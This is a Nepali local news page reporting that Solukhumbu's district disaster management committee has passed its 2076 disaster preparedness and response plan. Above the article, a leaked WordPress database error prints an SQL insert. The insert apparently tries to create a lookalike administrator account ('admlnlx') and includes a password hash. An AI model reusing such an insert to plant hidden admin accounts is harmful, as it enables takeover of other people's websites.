WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTsT3//Y20xgL6aZwms76R3lwFhiYy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:41:48', '', 'admlnlx', 'admlnlx')

सोलुखुम्बु जिल्लाको बिपद पूर्व तयारी प्रतिकार्य योजना २०७६ पारित – Gaule Khabar

सोलुखुम्बु जिल्लाको बिपद पूर्व तयारी प्रतिकार्य योजना २०७६ पारित

सोलुखुम्बु जिल्लाको बिपद पूर्व तयारी प्रतिकार्य योजना २०७६ पारित

गाउँले न्यूज, ५ असार सोलुखुम्बु । जिल्ला बिपद ब्यवस्थापन समिति सोलुखुम्बुले बिपद पुर्बतयारी प्रतिकार्य योजना २०७६ परिमार्जन सहित पारित गरेको छ ।

जिल्ला अधिकारी नरेन्द्र कुमार रानामगरको अध्यक्षमा बसेको बैठकले उक्त प्रतिकार्य योजना पारित गरेको हो । उक्त बैठकले परिमार्जन सहितको प्रतिकार्य योजना प्रकाशन गर्ने पनि निर्णय गरेको छ । जिल्लामा प्राकृतिक प्रकोप मध्ये सबै भन्दा बढी बाढी, पहिरो आगोलागी, सडक दुर्घटना, हुने गरेको जिल्ला बिपद ब्यवस्थापन सिमितिका संयोजक तथा प्रमुख जिल्ला अधिकारी नरेन्द्र कुमार रानाले बताए ।

कार्यक्रममा विभिन्न राजनीतिक दलका प्रतिनिधि, बिभिन्न कार्यलयका प्रमुख, गैरसकारी कार्यलयका प्रमुख तथा प्रतिनिधि सुरक्षा निकायका प्रमुखको उपस्थीतीमा कार्यक्रम सम्पन भएको हो ।

https://gaulenews.com/?p=46787

https://gaulenews.com/?p=46773

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका